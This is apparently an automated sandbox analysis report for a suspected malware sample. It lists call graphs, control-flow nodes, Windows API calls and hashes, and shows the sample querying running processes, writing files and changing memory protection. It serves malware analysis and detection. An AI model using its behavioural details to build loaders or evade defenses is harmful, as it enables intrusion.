1154->1155 1154->1158 1156 76a025 ReadFile 1155->1156 1157 76a060 CloseHandle 1156->1157 1156->1158 1157->1158 1158->1093 1160 76a8e6 1159->1160 1161 769be5 2 API calls 1160->1161 1162 76a9bb 1161->1162 1162->1095 1165 76aaa8 1163->1165 1164 76ab3d 1164->1102 1165->1164 1166 76abb5 4 API calls 1165->1166 1166->1165 1168 769f71 VirtualProtect 1167->1168 1168->1106 1171 769a78 1169->1171 1170 769ac6 1170->1102 1171->1170 1172 769045 GlobalAlloc 1171->1172 1172->1171 1174 76a675 GlobalAlloc 1173->1174 1175 7699a6 1174->1175 1176 76a675 GlobalAlloc 1175->1176 1177 7699c8 1176->1177 1177->1113 1196 7695e5 1178->1196 1180 7693da 1180->1125 1182 769995 GlobalAlloc 1181->1182 1183 76abc4 1182->1183 1202 76a5a5 CreateFileW 1183->1202 1187 76abe9 1187->1125 1189 76906f 1188->1189 1191 769076 1188->1191 1189->1102 1190 76a675 GlobalAlloc 1190->1191 1191->1189 1191->1190 1193 76a675 GlobalAlloc 1192->1193 1194 769258 1193->1194 1194->1109 1195->1129 1197 7695f4 1196->1197 1198 76a675 GlobalAlloc 1197->1198 1201 769600 1197->1201 1199 7696eb 1198->1199 1200 76a675 GlobalAlloc 1199->1200 1200->1201 1201->1180 1203 76a5d6 WriteFile 1202->1203 1204 76a5d2 1202->1204 1203->1204 1204->1187 1205 76bc05 1204->1205 1206 76bc16 1205->1206 1207 76bca9 malloc 1206->1207 1208 76bc55 1206->1208 1207->1208 1208->1187 1209 769b05 1214 769355 1209->1214 1211 769b1d 1212 769fb5 4 API calls 1211->1212 1213 769b45 1212->1213 1215 76a675 GlobalAlloc 1214->1215 1216 769363 1215->1216 1216->1211 1217 76b78b 1224 76b6db 1217->1224 1218 76b785 1220 769045 GlobalAlloc 1218->1220 1221 76b816 1218->1221 1219 769395 GlobalAlloc 1219->1224 1220->1221 1222 769245 GlobalAlloc 1221->1222 1223 76b820 1221->1223 1225 76b86f 1221->1225 1222->1225 1224->1218 1224->1219 1226 76abb5 4 API calls 1224->1226 1225->1223 1227 76a675 GlobalAlloc 1225->1227 1226->1224 1228 76b91c 1227->1228 1229 769be5 2 API calls 1228->1229 1230 76b953 1229->1230 1231 76a675 GlobalAlloc 1230->1231 1232 76b990 1231->1232 1233 76b9ad VirtualProtect 1232->1233 1234 769f65 1233->1234 1235 76b9ea VirtualProtect 1234->1235 1235->1223

                                                  Callgraph

                                                  • Executed
                                                  • Not Executed
                                                  • Opacity -> Relevance
                                                  • Disassembly available
                                                  callgraph 0 Function_0076A675 1 Function_0076BA75 2 Function_0076A475 34 Function_00769F35 2->34 72 Function_0076A1B5 2->72 3 Function_0076A275 4 Function_00769775 4->34 5 Function_0076C47C 6 Function_00769F65 7 Function_0076A165 52 Function_00769F05 7->52 8 Function_00769765 9 Function_00769C65 71 Function_0076ADC5 9->71 73 Function_0076BEB5 9->73 10 Function_0076C36D 11 Function_00769E55 54 Function_0076A205 11->54 12 Function_0076BA55 57 Function_0076ADF5 12->57 13 Function_00769355 13->0 30 Function_0076A335 13->30 14 Function_00769755 15 Function_00769855 15->0 15->6 15->7 98 Function_0076A085 15->98 16 Function_0076A555 17 Function_00769A55 17->6 23 Function_00769045 17->23 43 Function_0076AC25 17->43 18 Function_00769B55 18->73 19 Function_0076C458 20 Function_0076A245 21 Function_00769945 21->0 21->16 22 Function_0076A845 27 Function_0076BE45 22->27 23->0 23->6 23->43 44 Function_0076BF25 23->44 76 Function_007692B5 23->76 24 Function_00769245 24->0 32 Function_0076C135 24->32 25 Function_00769745 26 Function_00769A45 27->27 28 Function_00769543 29 Function_0076C337 31 Function_0076BB35 67 Function_0076BAD5 31->67 32->6 62 Function_0076A0E5 32->62 88 Function_0076BF95 32->88 33 Function_0076A435 33->62 35 Function_00769935 36 Function_0076A83B 37 Function_0076C424 38 Function_00769D25 38->34 91 Function_0076BE95 38->91 39 Function_0076A125 40 Function_00769325 40->62 41 Function_00769C25 42 Function_0076A625 42->34 45 Function_00769022 46 Function_0076C72D 47 Function_0076C21D 48 Function_0076C31B 49 Function_0076C419 50 Function_00769007 51 Function_0076BC05 51->1 51->62 65 Function_0076ACD5 51->65 53 Function_00769B05 53->3 53->13 79 Function_00769FB5 53->79 55 Function_0076A505 55->52 56 Function_0076C3F4 57->0 57->4 57->6 57->7 57->8 57->9 57->14 57->15 57->16 57->17 57->18 57->21 57->22 57->23 57->24 57->33 57->38 57->41 57->52 60 Function_00769BE5 57->60 64 Function_0076A6D5 57->64 66 Function_0076A8D5 57->66 69 Function_007698C5 57->69 57->71 75 Function_0076ABB5 57->75 57->79 81 Function_00769DA5 57->81 89 Function_00769395 57->89 90 Function_00769995 57->90 97 Function_0076AA85 57->97 58 Function_0076C1F2 59 Function_0076C6FD 60->0 60->72 61 Function_007695E5 61->0 61->6 61->34 63 Function_0076ADE5 64->0 64->38 64->62 82 Function_0076A4A5 64->82 65->31 66->9 66->60 66->62 68 Function_0076C7DF 69->0 69->6 69->7 69->98 70 Function_0076C2C5 72->34 73->52 73->91 74 Function_0076A6B5 75->51 75->74 83 Function_0076A5A5 75->83 75->90 77 Function_00769EB5 77->20 78 Function_0076A0B5 78->52 78->55 79->0 80 Function_0076ACB0 81->11 84 Function_0076ADA5 81->84 82->34 82->54 85 Function_0076C3A1 86 Function_0076C3AB 87 Function_0076C694 89->7 89->61 90->0 90->3 90->40 92 Function_00769D95 93 Function_0076A895 94 Function_0076BB95 95 Function_0076C19D 96 Function_0076C399 97->6 97->43 97->62 97->75 97->93 98->39 98->52 99 Function_0076A385 100 Function_0076B78B 100->0 100->4 100->6 100->7 100->8 100->16 100->18 100->23 100->24 100->33 100->41 100->52 100->60 100->71 100->75 100->89 101 Function_0076C788

                                                  Executed Functions

                                                  Function 0076A6D5 Relevance: 1.6, APIs: 1, Instructions: 123nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 217 76a6d5-76a6e3 218 76a6ea-76a6f1 217->218 219 76a6f7-76a70e call 76a675 218->219 220 76a83c-76a840 218->220 223 76a715-76a742 call 76a0e5 NtQuerySystemInformation 219->223 224 76a710 219->224 227 76a744-76a74c 223->227 228 76a74e-76a76b call 76a675 223->228 224->220 227->218 231 76a76e-76a774 228->231 232 76a835 231->232 233 76a77a-76a781 231->233 232->220 234 76a787-76a7a7 call 76a0e5 233->234 235 76a825-76a830 233->235 238 76a7b2-76a7b8 234->238 235->231 239 76a7de-76a80a call 76a4a5 call 769d25 238->239 240 76a7ba-76a7c6 238->240 247 76a814-76a81d 239->247 248 76a80c-76a812 239->248 240->239 241 76a7c8-76a7dc 240->241 241->238 247->235 249 76a81f-76a822 247->249 248->235 249->235
                                                  APIs
                                                    • Part of subcall function 0076A675: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0076A6A5
                                                  • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 0076A739
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobalInformationQuerySystem
                                                  • String ID:
                                                  • API String ID: 3737350999-0
                                                  • Opcode ID: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                  • Instruction ID: 341150ab29847415fbd6ffaecd52f22fcb3606a6634f7b85f713994eae00b212
                                                  • Opcode Fuzzy Hash: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                  • Instruction Fuzzy Hash: 5D51D8B5D0020AEFCB04DF98C884AAEB7B5BF48300F148559E916B7344D779AE41DFA1
                                                  Function 00769FB5 Relevance: 4.6, APIs: 3, Instructions: 79fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 00769FD7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                  • Instruction ID: 730d262103e5a0a9a0967f094f4a8946f5ed6298b18799b2bdef6c7fa2fa7368
                                                  • Opcode Fuzzy Hash: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                  • Instruction Fuzzy Hash: B9319975A00108FFDB14DF98C891F9EB7B9AF49710F20C198E919AB291E635AE41DB90
                                                  Function 0076ADF5 Relevance: 4.0, APIs: 2, Instructions: 995memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 13 76adf5-76b315 call 76a845 call 769da5 * 2 call 769c65 * 18 call 76a675 call 7698c5 call 769be5 call 769c65 * 8 call 76a675 call 769855 call 769be5 call 769c65 * 3 call 76a6d5 93 76b317-76b31e 13->93 94 76b345-76b48b call 769c65 * 3 call 769945 call 769fb5 call 769c65 call 76a8d5 13->94 95 76b329-76b32d 93->95 115 76b493-76b49e 94->115 116 76b48d-76b491 94->116 95->94 96 76b32f-76b343 call 76a435 95->96 96->95 117 76b4a4-76b502 115->117 118 76b4a0 115->118 116->117 119 76b504-76b54b call 76aa85 117->119 120 76b558-76b55e 117->120 118->117 125 76b550-76b553 119->125 122 76b590-76b5cb call 76a675 call 769f65 120->122 123 76b560-76b58b call 769a55 120->123 136 76b5d5-76b5db 122->136 129 76b825-76b839 123->129 125->129 131 76b880-76b88c 129->131 132 76b83b-76b877 call 769245 129->132 135 76b88f-76b8b2 call 769f05 131->135 141 76b87e 132->141 142 76b879 132->142 146 76b8b4-76b8bd 135->146 147 76b8c3-76ba3f call 769b55 call 76a675 call 76a165 call 76a555 call 769be5 call 76adc5 call 76a675 call 769f65 VirtualProtect call 769f65 VirtualProtect 135->147 139 76b5dd-76b608 136->139 140 76b60a-76b621 call 76a675 136->140 139->136 151 76b628-76b633 140->151 141->135 145 76ba49-76ba4c 142->145 146->147 199 76ba46 147->199 153 76b654-76b6b7 call 769995 call 769d25 call 769755 151->153 154 76b635-76b652 151->154 167 76b7f5-76b7fb 153->167 168 76b6bd-76b6d1 call 76a675 153->168 154->151 167->129 170 76b7fd-76b81e call 769045 167->170 177 76b6db-76b6e2 168->177 170->129 179 76b820 170->179 180 76b7cf-76b7f2 call 769765 177->180 181 76b6e8-76b70f call 769775 177->181 179->145 180->167 190 76b731-76b756 call 769395 181->190 191 76b711-76b72f call 76a435 181->191 197 76b75a-76b765 190->197 198 76b758 190->198 191->177 200 76b767-76b783 call 769c25 197->200 201 76b7ca 197->201 198->177 199->145 204 76b785-76b789 200->204 205 76b78d-76b7c6 call 76abb5 200->205 201->177 204->180 205->201 208 76b7c8 205->208 208->180
                                                  APIs
                                                    • Part of subcall function 0076A675: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0076A6A5
                                                    • Part of subcall function 00769BE5: LoadLibraryW.KERNELBASE(?), ref: 00769C16
                                                  • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 0076B9CA
                                                  • VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 0076B9FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual$AllocGlobalLibraryLoad
                                                  • String ID:
                                                  • API String ID: 2510009449-0
                                                  • Opcode ID: a34dc732b08cc3d88189158a146e47a5d440644af94d703805d599eb5e94a7b0
                                                  • Instruction ID: 1390fb41c03288269f79ebeca1f2e3dcfd69ea98affb922a24234655a971e3ab
                                                  • Opcode Fuzzy Hash: a34dc732b08cc3d88189158a146e47a5d440644af94d703805d599eb5e94a7b0
                                                  • Instruction Fuzzy Hash: 5892A7B5E00218EFCB14DBD8C995EEEB7B9AF88300F248199E509A7345D735AE45CF60
                                                  Function 0076A5A5 Relevance: 3.0, APIs: 2, Instructions: 50fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 209 76a5a5-76a5d0 CreateFileW 210 76a5d6-76a5f9 WriteFile 209->210 211 76a5d2-76a5d4 209->211 213 76a60b-76a617 210->213 214 76a5fb-76a609 210->214 212 76a619-76a61c 211->212 213->212 214->212
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0076A5C7
                                                  • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 0076A5F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: File$CreateWrite
                                                  • String ID:
                                                  • API String ID: 2263783195-0
                                                  • Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                  • Instruction ID: 1ca0c7f09ee4729d53c931552d44522365a14222fd2322c1cdfde1269869f7e3
                                                  • Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                  • Instruction Fuzzy Hash: 7F014075600208FBCB10DE98DD81F9AB7B9AF88314F20C155FE19AB281D631EE02DB90
                                                  Function 00769BE5 Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 250 769be5-769c21 call 76a675 call 76a1b5 LoadLibraryW
                                                  APIs
                                                    • Part of subcall function 0076A675: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0076A6A5
                                                  • LoadLibraryW.KERNELBASE(?), ref: 00769C16
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobalLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3361179946-0
                                                  • Opcode ID: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                  • Instruction ID: bf4d5def8b573a14da58c9e652b364f583385d3795b4c2aedc88d58b4cce9210
                                                  • Opcode Fuzzy Hash: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                  • Instruction Fuzzy Hash: EBE0ED75E00208FFCB00EFE8DD8699D7BB8AF49211F108194FD0DA7340E635EA118B91
                                                  Function 0076BC05 Relevance: 1.5, APIs: 1, Instructions: 204COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 255 76bc05-76bc53 call 76a0e5 260 76bc55-76bc57 255->260 261 76bc5c-76bc94 255->261 262 76be38-76be3b 260->262 265 76bc96-76bca4 261->265 266 76bca9-76bcd5 malloc 261->266 265->262 267 76bce0-76bce6 266->267 269 76bd66-76bd6a 267->269 270 76bce8-76bcef 267->270 271 76bd8e-76bda5 call 76acd5 269->271 272 76bd6c-76bd89 269->272 273 76bcfa-76bd00 270->273 280 76bdc6-76bdf2 271->280 281 76bda7-76bdc4 271->281 272->262 275 76bd02-76bd1c 273->275 276 76bd61 273->276 282 76bd21-76bd5f call 76ba75 275->282 276->267 283 76bdfd-76be05 280->283 281->262 282->273 286 76be07-76be28 283->286 287 76be2a-76be31 283->287 286->283 292 76be36 287->292 292->262
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                  • Instruction ID: f947e5f87ca58770a6f060f9439c93901d89ebc754ae8788d8df1d648750fec9
                                                  • Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                  • Instruction Fuzzy Hash: EF91DB75D04109EFCB08CF98D890AEEBBB5BF49300F148159E916AB351D734AA85CFA0
                                                  Function 0076A675 Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 317 76a675-76a683 318 76a685-76a68e 317->318 319 76a691-76a6aa GlobalAlloc 317->319 318->319
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0076A6A5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  • Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                  • Instruction ID: 276477d01cf5a05c104782cbd17e8212534ada490f883687118c060f804ad53e
                                                  • Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                  • Instruction Fuzzy Hash: F9F02278614209EFCB44DF58D580959B7A5EB48360F20C299AC599B341D631EE81DB94

                                                  Non-executed Functions

                                                  Function 0076ADA5 Relevance: .0, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                  • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                  • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                  • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

                                                  Execution Graph

                                                  Execution Coverage:4.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:31.7%
                                                  Total number of Nodes:1479
                                                  Total number of Limit Nodes:11
                                                  execution_graph 32948 323a573 32949 323a716 32948->32949 32951 323a59d 32948->32951 32999 3231262 14 API calls __dosmaperr 32949->32999 32951->32949 32954 323a5e8 32951->32954 32953 323a733 32969 323eeb0 32954->32969 32958 323a61c 32959 323a735 32958->32959 32984 323e595 32958->32984 33007 322f049 IsProcessorFeaturePresent 32959->33007 32962 323a62e 32962->32959 32991 323e5c1 32962->32991 32963 323a741 32965 323a640 32965->32959 32966 323a649 32965->32966 32967 323a701 32966->32967 32998 323ef0d 25 API calls 2 library calls 32966->32998 33000 32299c0 32967->33000 32970 323eebc __FrameHandler3::FrameUnwindToState 32969->32970 32971 323a608 32970->32971 33011 32326f0 EnterCriticalSection 32970->33011 32977 323e569 32971->32977 32973 323eecd 32974 323eee1 32973->32974 33012 323ed89 32973->33012 33032 323ef04 LeaveCriticalSection std::_Lockit::~_Lockit 32974->33032 32978 323e575 32977->32978 32979 323e58a 32977->32979 33154 3231262 14 API calls __dosmaperr 32978->33154 32979->32958 32981 323e57a 33155 322f01c 25 API calls __wsopen_s 32981->33155 32983 323e585 32983->32958 32985 323e5a1 32984->32985 32986 323e5b6 32984->32986 33156 3231262 14 API calls __dosmaperr 32985->33156 32986->32962 32988 323e5a6 33157 322f01c 25 API calls __wsopen_s 32988->33157 32990 323e5b1 32990->32962 32992 323e5e2 32991->32992 32993 323e5cd 32991->32993 32992->32965 33158 3231262 14 API calls __dosmaperr 32993->33158 32995 323e5d2 33159 322f01c 25 API calls __wsopen_s 32995->33159 32997 323e5dd 32997->32965 32998->32967 32999->32967 33001 32299c8 33000->33001 33002 32299c9 IsProcessorFeaturePresent 33000->33002 33001->32953 33004 3229bf5 33002->33004 33160 3229bb8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33004->33160 33006 3229cd8 33006->32953 33008 322f055 33007->33008 33161 322ee6d 33008->33161 33011->32973 33013 323edd5 33012->33013 33014 323eddc 33013->33014 33015 323eded 33013->33015 33016 323ee53 33014->33016 33018 323ee4a 33014->33018 33134 32383e5 15 API calls 3 library calls 33015->33134 33019 323ee50 33016->33019 33095 323ec2f 33016->33095 33033 323e98e 33018->33033 33023 32381b6 _free 14 API calls 33019->33023 33022 323ee02 33135 32381b6 33022->33135 33024 323ee5e 33023->33024 33026 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33024->33026 33029 323ee6c 33026->33029 33027 323edfb 33027->33022 33030 323ee2a 33027->33030 33028 323ee08 33028->33014 33029->32974 33031 32381b6 _free 14 API calls 33030->33031 33031->33028 33032->32971 33034 323e99e 33033->33034 33035 323e5c1 25 API calls 33034->33035 33036 323e9bd 33035->33036 33037 323ec24 33036->33037 33039 323e569 25 API calls 33036->33039 33038 322f049 __Getctype 11 API calls 33037->33038 33041 323ec2e 33038->33041 33040 323e9cf 33039->33040 33040->33037 33042 323ea29 33040->33042 33045 323ec1d 33040->33045 33044 323e5c1 25 API calls 33041->33044 33141 32383e5 15 API calls 3 library calls 33042->33141 33047 323ec5c 33044->33047 33045->33019 33046 323ea3a 33048 32381b6 _free 14 API calls 33046->33048 33094 323ebff 33046->33094 33049 323ed7e 33047->33049 33052 323e569 25 API calls 33047->33052 33051 323ea50 33048->33051 33054 322f049 __Getctype 11 API calls 33049->33054 33050 32381b6 _free 14 API calls 33053 323ec1c 33050->33053 33142 323c669 25 API calls 2 library calls 33051->33142 33055 323ec6e 33052->33055 33053->33045 33060 323ed88 33054->33060 33055->33049 33057 323e595 25 API calls 33055->33057 33059 323ec80 33057->33059 33058 323ea7e 33061 323ec22 33058->33061 33080 323ea89 __fread_nolock 33058->33080 33059->33049 33062 323ec89 33059->33062 33063 323eddc 33060->33063 33065 323eded 33060->33065 33061->33037 33064 32381b6 _free 14 API calls 33062->33064 33066 323ee53 33063->33066 33069 323ee4a 33063->33069 33068 323ec94 GetTimeZoneInformation 33064->33068 33148 32383e5 15 API calls 3 library calls 33065->33148 33070 323ee50 33066->33070 33071 323ec2f 41 API calls 33066->33071 33076 323ecb0 __fread_nolock 33068->33076 33084 323ed58 33068->33084 33072 323e98e 41 API calls 33069->33072 33074 32381b6 _free 14 API calls 33070->33074 33071->33070 33072->33070 33073 323ee02 33077 32381b6 _free 14 API calls 33073->33077 33075 323ee5e 33074->33075 33078 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33075->33078 33145 3232a17 37 API calls __Getctype 33076->33145 33081 323ee08 33077->33081 33082 323ee6c 33078->33082 33079 323edfb 33079->33073 33083 323ee2a 33079->33083 33143 323e947 42 API calls 6 library calls 33080->33143 33081->33063 33082->33019 33085 32381b6 _free 14 API calls 33083->33085 33084->33019 33085->33081 33088 323ed33 33146 323ee6e 42 API calls 4 library calls 33088->33146 33090 323ed44 33147 323ee6e 42 API calls 4 library calls 33090->33147 33093 323ead4 33093->33094 33144 323e947 42 API calls 6 library calls 33093->33144 33094->33050 33096 323ec3f 33095->33096 33097 323e5c1 25 API calls 33096->33097 33098 323ec5c 33097->33098 33099 323ed7e 33098->33099 33100 323e569 25 API calls 33098->33100 33101 322f049 __Getctype 11 API calls 33099->33101 33102 323ec6e 33100->33102 33105 323ed88 33101->33105 33102->33099 33103 323e595 25 API calls 33102->33103 33104 323ec80 33103->33104 33104->33099 33106 323ec89 33104->33106 33107 323eddc 33105->33107 33109 323eded 33105->33109 33108 32381b6 _free 14 API calls 33106->33108 33110 323ee53 33107->33110 33113 323ee4a 33107->33113 33112 323ec94 GetTimeZoneInformation 33108->33112 33152 32383e5 15 API calls 3 library calls 33109->33152 33114 323ee50 33110->33114 33115 323ec2f 41 API calls 33110->33115 33127 323ed58 33112->33127 33128 323ecb0 __fread_nolock 33112->33128 33116 323e98e 41 API calls 33113->33116 33118 32381b6 _free 14 API calls 33114->33118 33115->33114 33116->33114 33117 323ee02 33120 32381b6 _free 14 API calls 33117->33120 33119 323ee5e 33118->33119 33121 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33119->33121 33123 323ee08 33120->33123 33124 323ee6c 33121->33124 33122 323edfb 33122->33117 33125 323ee2a 33122->33125 33123->33107 33124->33019 33126 32381b6 _free 14 API calls 33125->33126 33126->33123 33127->33019 33149 3232a17 37 API calls __Getctype 33128->33149 33130 323ed33 33150 323ee6e 42 API calls 4 library calls 33130->33150 33132 323ed44 33151 323ee6e 42 API calls 4 library calls 33132->33151 33134->33027 33136 32381c1 HeapFree 33135->33136 33137 32381ea _free 33135->33137 33136->33137 33138 32381d6 33136->33138 33137->33028 33153 3231262 14 API calls __dosmaperr 33138->33153 33140 32381dc GetLastError 33140->33137 33141->33046 33142->33058 33143->33093 33144->33094 33145->33088 33146->33090 33147->33084 33148->33079 33149->33130 33150->33132 33151->33127 33152->33122 33153->33140 33154->32981 33155->32983 33156->32988 33157->32990 33158->32995 33159->32997 33160->33006 33162 322ee89 __fread_nolock std::locale::_Setgloballocale 33161->33162 33163 322eeb5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 33162->33163 33164 322ef86 std::locale::_Setgloballocale 33163->33164 33165 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33164->33165 33166 322efa4 GetCurrentProcess TerminateProcess 33165->33166 33166->32963 33167 3230632 33168 3230640 33167->33168 33169 323064e 33167->33169 33170 32306a4 57 API calls 33168->33170 33180 322e919 33169->33180 33172 323064a 33170->33172 33176 323067c 33178 323069e 33176->33178 33179 32381b6 _free 14 API calls 33176->33179 33179->33178 33211 322e1f7 33180->33211 33184 322e93d 33185 322e8fc 33184->33185 33223 322e84a 33185->33223 33188 32306a4 33189 32306b2 33188->33189 33190 32306cf __fread_nolock 33188->33190 33274 323124f 14 API calls __dosmaperr 33189->33274 33194 3230711 CreateFileW 33190->33194 33195 32306f5 33190->33195 33192 32306b7 33275 3231262 14 API calls __dosmaperr 33192->33275 33196 3230743 33194->33196 33197 3230735 33194->33197 33277 323124f 14 API calls __dosmaperr 33195->33277 33280 3230782 49 API calls __dosmaperr 33196->33280 33248 323080c GetFileType 33197->33248 33198 32306bf 33276 322f01c 25 API calls __wsopen_s 33198->33276 33203 32306fa 33278 3231262 14 API calls __dosmaperr 33203->33278 33204 323073e __fread_nolock 33209 323070c 33204->33209 33210 3230774 CloseHandle 33204->33210 33205 32306ca 33205->33176 33207 3230701 33279 322f01c 25 API calls __wsopen_s 33207->33279 33209->33176 33210->33209 33212 322e217 33211->33212 33218 322e20e 33211->33218 33212->33218 33220 3236dd0 37 API calls 3 library calls 33212->33220 33214 322e237 33221 32375f6 37 API calls __Getctype 33214->33221 33216 322e24d 33222 3237623 37 API calls __cftoe 33216->33222 33218->33184 33219 323880f 5 API calls std::_Lockit::_Lockit 33218->33219 33219->33184 33220->33214 33221->33216 33222->33218 33224 322e872 33223->33224 33225 322e858 33223->33225 33227 322e898 33224->33227 33228 322e879 33224->33228 33241 322e958 14 API calls _free 33225->33241 33243 3238433 MultiByteToWideChar 33227->33243 33232 322e862 33228->33232 33242 322e972 15 API calls __wsopen_s 33228->33242 33231 322e8a7 33233 322e8ae GetLastError 33231->33233 33234 322e8d4 33231->33234 33246 322e972 15 API calls __wsopen_s 33231->33246 33232->33176 33232->33188 33244 323122c 14 API calls 2 library calls 33233->33244 33234->33232 33247 3238433 MultiByteToWideChar 33234->33247 33238 322e8ba 33245 3231262 14 API calls __dosmaperr 33238->33245 33240 322e8eb 33240->33232 33240->33233 33241->33232 33242->33232 33243->33231 33244->33238 33245->33232 33246->33234 33247->33240 33250 3230847 33248->33250 33252 32308f9 33248->33252 33249 3230861 __fread_nolock 33256 3230880 GetFileInformationByHandle 33249->33256 33264 32308f0 33249->33264 